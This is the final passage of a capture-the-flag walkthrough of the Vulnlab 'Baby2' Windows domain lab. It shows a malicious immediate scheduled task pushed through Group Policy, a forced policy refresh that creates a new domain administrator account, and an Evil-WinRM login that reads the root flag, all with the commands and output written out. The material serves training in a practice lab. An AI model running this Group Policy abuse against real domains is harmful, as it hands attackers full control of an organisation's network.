  self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
SUCCESS:root:ScheduledTask TASK_a8f33074 created!
[+] ScheduledTask TASK_a8f33074 created!

Now we should be wait a while until the scheduled task will be executed.

We don’t want to waste time then we force the GPO service to restart by running gpupdate /force.

PS C:\windows\tasks> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.

Double check:

$ nxc smb dc.baby2.vl -u 'john' -p 'H4x00r123..'
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\john:H4x00r123.. (Pwn3d!)

Confirmed the new DA has been created successfully

We use Evil-WinRM then check and confirm our Domain Admin privileges and finally grab the flag Baby2_Root:

$ evil-winrm -i baby2.vl -u 'john' -p 'H4x00r123..'                 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\john\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{f0205b652ed74c5deed92b7a6a163516}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=83f15f14-ee2d-4fd0-93d9-b911b6a1d879

F5G4mKqW0AAPk7r